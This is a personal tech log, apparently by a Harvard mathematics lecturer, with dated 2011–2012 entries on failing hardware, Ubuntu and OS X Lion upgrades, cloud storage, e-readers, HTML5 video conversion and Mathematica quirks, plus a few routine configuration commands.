07-06-2012: Strange how several things can fail at once. A 2 year old solid state drive at home started to fail. At first, only temporary glitches appeared, with files starting to disappear, programs stopping in strange moments, evenso the system was up, finally more and more segfaults. Simultaneously, also the graphics card started to choke up and a hard drive cable to a regular HD failed too. With different things failing, then its harder to debug. Things are of course always linked. For example: when trying to debug a drive, cables are moved and checked, drives are changed: these manipulations can damage an other, previously healthy cable. Related: Ubuntu installs the bootloader by default on a different drive. Its better to use a custom installation, then make sure that both the bootloader as well as the OS are on the same SSD drive. Its easier to debug in case of drive failures. With a separate setup, one can for example unmount a drive and analyze it.
06-06-2012: Whiteboard on the ipad is also nice to use because it allows to from the ipad to see flash content (the host computer has the flash plugin). Unfortunately, if using in an university setting, one can make a local network but then not use the web. Splashtop streamer does not go through the Harvard wireless (maybe by purpose since thats a big bandwith hog).
01-06-2012: The Harvard IT summit was nice and well organized. Anand Agraval talked about edX and demonstrated an electronics course, which has 120 thousand students enrolled. Of course, the drop out rate is high, only 10 K took the midterm. Summit Handouts.
10-05-2012: Cool. The Harvard bookstore allows now to do print books. Featured in Forbes. Despite the fact that electronic books come more and more, there are advantages of real books. I do not always finish reading an electronic book. The attention span is smaller. Could well be that real books and electronic books continue to coexist. I personally like to have both the electronic and real version, the electronic version more is especially convenient for searching things.
05-05-2012: A cool theorem generator and Snarxiv.org preprint archiv and Philosophy of the day.
05-03-2012: Larry Gonick, who just published a Cartoon guide in Calculus talked yesterday at Harvard. He showed lots of cartoons, also from other cartoonists like the Mexican cartoonist Rius and others as well as older stuff of his. Larry Gonick had been a Harvard math concentrator but did not graduate. It became apparent that Gonick's contribution to make science and history more accessible is invaluable. He might achieve more with with his comics especially chemistry, biology or technical cartoons than any standard textbook and can make complex things accessible to a larger audience. One of the questions which came up was how cartoonists can finance themselves. Gonick had been lucky to have some mentor ship by Jacqueline Onassis. Gonick seems to believe that not only newspapers, but also books are doomed and that authors might have to to turn back to get sponsored as it happend in the past. Gonick might actually prove otherwise with his own work both for newspapers and books.
19-01-2012: Just tried out iBooks author. I find it even easier to use than pages, which sometimes produces layout difficulties. Whether this will change the textbook remains to be seen. The fact that everybody can make music with Garageband has also not necessarily changed the way music is consumed. Its nice that one can now easily build books for the ipad with interactive media. Will be great for the classroom. [Update Jan 23, 2012: each page has to be worked on in landscape and portrait mode. This can lead to some frustration because the layout needs to be done twice. The page layout is a bit quirky. Changing things in landscape mode can have unexpected consequences in the other mode. ]
21-12-2011: A good article in Stanford Law Review about SOPA. Despite an apparent stall, warnings from law experts, business scholars, engineers, commedians, founders of internet companies, bloggers, there will be a special session today.
11-11-2011: With Adobe Flash retreating and Silverlight dying [I use Silverlight only for netflix and it starts having problems in OSX. Plugin problems are an early indication of trouble. Remember Realaudio], the question whether to switch to HTML 5 has become more prevalent. I maintain a math movie pagewith currently 4 Gig of movie files) and rhetorik, where movie files contribute the bulk of the currently 40 gig of hosted material. While the conversion is trivial technically and can be done as a batch job using ffmpeg (like ffmpeg -i file.flv file.mp4; ffmpeg -i file.flv file.ogg), the conversion to HTML5 would triple the space. HTML5 does still not work everywhere and a flash backup is needed. Problems remain for various operating system and browser combinations, especially in linux, where sound problems with ogg or mp4 files are still common even with fresh installations of the newest Ubuntus. But the major issue is space and so hosting bandwith. On a page with a few dozen movie files, the question is of course not relevant. Switching to HTML would mean tripling the hosted space (because mp4,ogg and flv files need to be created additionally to the native source files which are quicktime files in my case). Because websites as well as workstation need to be backed up and the "video technicians" work space contains a multiple of the actual hosted page (For rhetorik.ch, I collect about 20 Gig of media files per year in average the last couple of years), a switch to HTML 5 could mean that 2 TB Hardrives are no more enough. To summarize, a switch to HTML5 would cost not only more work and a couple of hundred bucks more per year in order to work reliably. The additional costs come since harddrives need to be replaced regularly for reliability purposes, regular backup on media which are no more overwritten need to be created and stored externally. Add costs could become even higher with hosting band with tripling. There is no doubt that switching to plug-in free videos will be the future but the lack of a standard forcing several parallel implementations makes it still impractical if time and money budget constraints are present and the websites are reasonably large.
11-2-2011: Examples where UI simplifications went too far: 1) In many applications like Preview in OS X Lion, it is no more possible to "Save as". It has been replaced as "Save a version". Fortunately, there is still the command line. 2) Unity in Ubuntu: I agree with most critics that it has become so much dumbed down that it has become unusable. Windows often can no more be resized as usual for example, after opening a terminal from the doc, a second terminal would not open. Getting to applications is too complicated. Fortunately there are other windows managers like blackbox or fluxbox. 3) Firefox application handling: it is no more possible to edit freely how applications are handled. The option "Save as" has disappeared for many entries like for "apt", where it is assumed that one would not want to save a .deb file. 4) Unlike in "OS X Snow Leopard", in "OSX Lion", even third party screen capture programs can no more access screen buffers while iDVD is running. It forces the user to rip the DVD first.
10-19-2011: Tried an iterated Ubuntu upgrade without a fresh install. Back in my redhat/mandrake/early ubuntu times, upgrades have often led to dependency problems which usually implied a system paralysis. A stepwise upgrade from Ubuntu 9.4 to 10.10 went now surprisingly well, even so it took an entire night. From 9.10 to 10.4, the X configuration broke (I had to use a backup Xorg.conf). From 10.4 to 10.10, the session managers got confused (gdm and lightdm competed) which did not bring up the login screen and made a remote login necessary. Also the "software-center" in "blackbox" did not spawn a new screen and needed switches to "unity". The "evolution" mail reader I had used for reading archived mbox mail files does no more read mbox files and had to be replaced by "Thunderbird" which handles mbox files well. I might still have to do a fresh install on a new SSD because the upgrade ate additional space. [Update of October 25: more upgrade issues: "evince" and "banshee" sometimes brought down the machine and needed to be removed, also "xlock" behaved in a weird way and sometimes need a remote login to be killed. Heavy rsync processes slowed down the machine more than in Ubuntu 9.10. Copy-paste problems with German Umlaute in xterm have cropped up again and a shell script wrapper around xterm which sources first the local ~/.bashrc file is necessary. By the way, also OSX does not copy paste Umlaute correctly into a terminal and a complicated switch of language is required.] [Update Nov 2: reinstalled Ubuntu 10.10 (64 bit) from scratch on a new 128 gig SSD by cloning the distro "dpkg --get-selections > installed.txt" in old and "dpkg --set-selections < installed.txt dselect" in the new. I had initial sound problems which were solved after disabling the automatically chosen high def Audio controller. Keeping the habit of replacing harddrives regularly and not having done so for 18 months, I switched also to a 2TB main hard drive, even so the Thailand floods make it probably the worst moment to do so. Still, HD prizes could go up even more. A WD Caviar 7200 RPM work horse speeds up rsyncs considerably (I sync several hundred gigs daily), while cheaper, slower but greener 5900 RPM drives serve well as secondary backup drives; of course fast SSD's are used for the operating systems and make a huge difference.]
20-09-2011: The upcoming Kindle Fire will be fast but having all data going through Amazon's servers raises concerns. The "mighty Amazon proxy" can still be turned off. Unlike a proxy or internet provider, Amazon will store web addresses, IP and Mac addresses and store also the website temporarily on their local servers.
24-09-2011: Strange: I can access some files from home but not from the Harvard network (nor could my students). No local .htaccess files are in place. The only explanation is that certain folders are filtered. After copying over the "hourly" folder to exam1 folder, the files become accessible. A similar thing had takes place for "homework". More details here.
06-09-2011: A video giving a glimpse about Color E-Ink technology for electronic textbooks in the future. One of the problems today with E-ink is that documents with lots of details like in mathematics or sciences are not suitable yet. This will change.
04-09-2011: An interesting article in the NYT shows interactive whiteboards in the Kyrene school in Arizona. "The digital push here aims to go far beyond gadgets to transform the very nature of the classroom, turning the teacher into a guide instead of a lecturer, wandering among students who learn at their own pace on Internet-connected devices." My own take to this: as the history of teaching with technology have shown: pilot projects do not say anything. Pioneers are always especially motivated and want their projects to work and justify the investments. Its always a "huge success". Whether the concept works on a wide level is not clear. A major obstacle is that teaching with technology in a classroom where students go about in their own pace is challenging for the teacher. There is a risk to lose focus, missing preparation and less commitment to reach minimal goals for every student. We have also learned from the past that once the "coolness factor" is over, many technologies can produce aversion, especially if they are used in a wrong way or overdone. This happened with calculators, overhead projectors, powerpoint presentations or with clickers: in the case of calculators, teachers started to focus on the graphing calculator itself whose use remind of cellphones before smartphones came in, in the case of presentations, students would just copy paste information from the web into powerpoint and teachers recycle overhead slides or powerpoint presentations from other teachers or previous years. In the case of clickers, the technology would be used for class attendance or to evaluate students. I myself think that the future is in using a large variety of tools and methods. Experiments as described in that NYT article are extremely valuable. Technology wise interactive tablet like "white boards" will certainly become part of any classroom in such a way that every wall can morph either to a blackboard or a monitor or interactive white board where interactive "aps" can run.
10-07-2011: The new feature "Versions" on Lion can grab a lot of disk space. Once close to the hard drive limit, there is no rescue anymore and the user is pushed over the abyss. The warnings come too late. Even deleting 10 Gig does not help anymore. A reboot is necessary. I constantly fight with disk space on my "macbook air" and walk a dangerous line. While preparing for a review summer school (where keynote files can be several gigabytes large), I lost the work of an evening because all "versions" were gone. [Unchecking "Restore windows when quitting and re-opening apps" in System Preferences/General solves the autosave issue.]
07-07-2011: An interesting article on grading. It reports on experiments to replace grading by teaching staff by "evaluators" or robots. Separating the grading from teaching staff is also an attempt to fight grade inflation. "Western Governors" mentioned in the article is an online university where things are more geared towards technology. In my experience, exams which are "computer gradable", still tend to be poor, uninspiring and need substantial authoring effort to be effective. Already in mathematics, we can see during the grading phase that students have come up with innovative ideas and angles which were not anticipated. A machine would overlook them or grade them wrongly and nobody would notice. Other challenges with online examinations is to assure that the exam is taken without external human or technological help. Tests which are easily to grade tend also to be easy to beat with technological help: in the simplest case just enter the question into a search engine.
05-08-2011: While grading mathematica projects and rendering some of the graphics, I could confirm what students tell me: Mathematica 8 can runs out of memory, even with modest graphics jobs. Crashes come without warning and are especially annoying if one uses the front end because work gets lost. I personally do not use the Mathematica "front end" most of the time and have access to machines with up to 24 Gig of memory so that I can often avoid the problem. On the feature side and coolness, Mathematica has made lots of progress graphics can be gorgeous. Mathematica 8.0 still needs more stability. Even with 8 Gig of RAM things can crash more than Mathematica 2.0 back on my NextStation with 8 Meg of RAM.
03-08-2011: Mathematica theoretically should be able to access mysql servers. Needs["DatabaseLink`"]; JDBCDrivers["MySQL(Connector/J)"];
OpenSQLConnection[ JDBC["MySQL(Connector/J)", "db"], "Username" -> "root", "Password" -> "pwd"]
Does not work for me: (JDBC:error: Communications link failure). Its easy however just to extract the tables from mysql with Perl and write them out in a form which is readable by Mathematica.
31-07-2011: I added DuckDuckGo as a remedy to avoid the search engine bubble.
29-07-2011: I tried out the "Ubuntu one" cloud services. I do not use desktop tools like nautilus so that command line sharing is the only option. One has to install u1sdtool and type
 u1sdtool --list-folders 
u1sdtool create-folder /home/user/list/to/directory
to shares the directory. "Ubuntu one" is not yet available on OSX however.
28-07-2011: After using Lion for more than a week, the biggest nuisance is the sluggish "Preview" application, both for opening and closing large documents as well as scrolling through them. Opening or closing can take minutes - unbearable. I suspect that "versions" is the culprit. Besides Quicktime, Preview is one of the reasons, I use the Mac regularly. "Preview" allows to rearrange, copy paste and orient movies or PDFs. Lion also by default starts previously open applications after a reboot. [update September 4, 2011: as mentioned in heise article
defaults write com.apple.Safari ApplePersistenceIgnoreState YES
defaults write com.apple.Preview ApplePersistenceIgnoreState YES
defaults write com.apple.Keynote ApplePersistenceIgnoreState YES
solves this. It seems that the reason for start-up lags is often that the application does not find old documents any more and searches for them. This is for me often the case because the laptop is only used for temporary work. ]
22-07-2011: The google logo from today writes the PNG data directly into the style file and allows so to animate it. Here is the picture only. Look at the source.
20-07-2011: I installed Lion on two computers. Instructions on how to get a bootable USB stick are everywhere. The installation with the USB drive on the Mac Air was actually faster than on the much mightier iMac (using the native installation). Lion is much snappier than Snow Leopard (with the exception of "Preview" which can lag, probably due to "versions". Latency is the worst enemy of a good user experience. Some applications do more work: Graphing calculator and the 360-com unwrapper or 2004 Microsoft Excel, Word and Powerpoint. Good riddance for the later. The Lion installation ate 3 additional Gigs on my already maxed out mac air. I could not turn off legacy file vault for example. [Update July 21: without having to ask I got a copy of Graphing calculator 4.0 by mail from pacifict.com. Nice.] [Update July 22: after upgrading developer tools which I always need (I use "make" for almost everything for example). On my "macbook air" with only 64 gig, "Lion" devoured in total 6 gig even after deleting the XCode installation and the /Developer directory. Since I use the laptop only for temporary work, sync the necessary folders forth and back from my linux box but Keynote presentations and music files gobble up pretty fast the available user space. It is clear is that my next macbook air will have 256 Gig.]
13-07-2011: After the drop box EULA disaster, a good summery over some cloudy cloud issues. Beside ownership issues and risks, the cloud services I had tried out also only work well with small amount of data but suck with more. A few hundred or maybe thousand files work well, but that is nothing today. An other issue which will slow down these data services are cable provider bandwidth caps. Legal, reliability, bandwith reasons will be a big obstacle also for the google chromebook adaptation. Additional to latency issues (see July 5 entry).
05-07-2011: Funny that my battery problems of my ipod touch disappeared after a recent jail break. Apple should definitely add a preference entry to remove multitasking. I in general try to run as many processes as possible on any computer. Sometimes this is important like with huge Mathematica jobs (even in Linux) jobs which are notoriously memory hungry. On the ipod touch, I prefer to have one process at a time. It is the fractions of seconds of delays in a program which drive the user nuts. Latency is a big stress factor. Thats why I use linux, lean windows managers, solid state drives and remove any processes which are not needed.
27-06-2011: Changed my homepage from Google to Yandex. The black navigation bar is too ugly to bare. Its strange, how little things can annoy but with a black desktop background, the browser showing the google main page appears to be cut in two.
27-06-2011: I Bought one of the new cheap Nooks. PDF reading does not always work well, especially if files have been written in latex and contain mathematical content. Font size, line break issues. Also not all pictures appear. As a text reader however, it is terrific. When hooked up by USB, the nook can be accessed as a drive. Also the fact that documents can be loaded onto Micro SD cards is nice. With 32 Gig, I can put all the book PDFs onto it. Unfortunately, most books are in DjVu format and there is no luck with that. Would be nice if one could put content onto it wirelessly. Also nice would be a program which would trim PDFs so that they read nicely on the nook, possibly cut away stuff which do not render well.
09-06-2011: Interesting Google Logo today.
22-05-2011:
A NYT article addresses the issue of personalized and localized search. It has become a nuisance so search for something only to get results connected to me. The localization and device dependence is even more so (Examples: I can not reach "google.com" from Switzerland and get directed to "google.ch", certain news websites like NYT limit access to ipads). Today, in order to get unbiased search results it is necessary to turn on "privacy filters" or to use proxis. Otherwise, we get fed results which fit to a profile which has been made about us. Search has so become less reliable. The google matrix has become relative. This is a problem because "facts and information" become relative. Imagine getting the news modified to your place or to your political opinion. We like to read our own opinon and like it but we start to live in parallel universes where each person gets fed an individualized internet soup. Not that the rest of the internet does not exist, it has already unreachable parts if search does not lead to it anymore. We live in a "fragmented web".
15-04-2011: I'm not a friend of "cloud" stuff (yet), but since more and more around me use dropbox, I had to try it. Security issues with dropbox are a big issue for me. In that respect Wuala is better. It had originally been developed at my alma mater ETH. The name comes from "Voila". Similarly as in Dropbox, one can copy or sync files into the shared folder. Some issues: in linux, if wuala does not run and "ls" is done, then a message ls: cannot access WualaDrive: Transport endpoint is not connected appears. One can get rid of this with fusermount -u WualaDrive. Both in linux as well as OSX, the mounted javafs can produces some user lag on the command line. Wuala still needs to reduce its footprint. Still, having everything encrypted on the client side is essential and the only option for education similarly as for health care. A third party outside the university should not have access to student, patient or research data.
03-04-2011: Academic use of Social media, May 3, 2011
16-04-2011: An example of a Prezi presentation by Alison Blank. The idea is good but I doubt it will replace powerpoint. The problem with nonlinear presentations is that one can easily get lost. A nonlinear mindmap structure is nice to organize topics and for good speakers like Chris Anderson who seems be assisted during the talk in running the nonlinear presentation or has linearized the presentation for the talk.
15-04-2011: The ears PRS looks very promising. Some questions of Brian Lukoff used in my 1a class.
22-03-2011: I use several backup layers under linux (while working, with flashback, half daily full backups done on internal backup drives by cron, sync with different machines several times per day, weekly long time backups on different drive. But then also "write only backups" on harddrives which are encrypted and stacked and regularly sent out of town. It was still possible to lose data: just before spring break, I had been writing a handout for a course and later in spring break, I noticed that the file had been overwritten by an other file (I must have copied a template to the wrong place at some point and not noticed for several days). At the time when the problem was noticed, all shorter term backups had been overwritten, and longer term (read only) backups had not yet kicked in. I had lost the handout. At the time, when I noticed the problem, the 5 existing backups layers were all overwritten. Fortunately, I had a printout, since it had been given to the class already before the spring break and I could just retype it. But it was annoying. That day, I bought an additional 4TB drive, attached it to a mac by firewire and now backup part of my linux box on the mac, where OSX keeps old versions with time machine. I hope TimeVault (which is still alpha) will mature soon.
12-01-2011: A google group discussed some strange behavior of the Mathematica function Clip. Run this and you will see. I defined my own function Clip1 to illustrate it
Clip[1.00000000000000036]
Clip[1.000000000000000360000]
Clip1[x_]:=Sign[x]*Min[Abs[x],1]
Clip1[1.00000000000000036]
Clip1[0.9999999999999966]
Clip1[0.9999999999999966000]
There are confusing things going on in Mathematica with respect to accuracy. In the second last example, the result should be rendered at least in the same accuracy. All involved functions Sign, Min and Abs should be implemented in arbitrary accuracy. They only refer to order and sign.

Oliver Knill, Department of Mathematics, Harvard University, One Oxford Street, Cambridge, MA 02138, USA. SciCenter 432 Tel: (617) 495 5549, Email: knill@math.harvard.edu Twitter, Youtube, Vimeo, Linkedin, Scholar Harvard, Academia, Google plus, Google Scholar, Ello, Webcam, Fall 2017 office hours: Mon-Fri 4-5 PM and by appointment.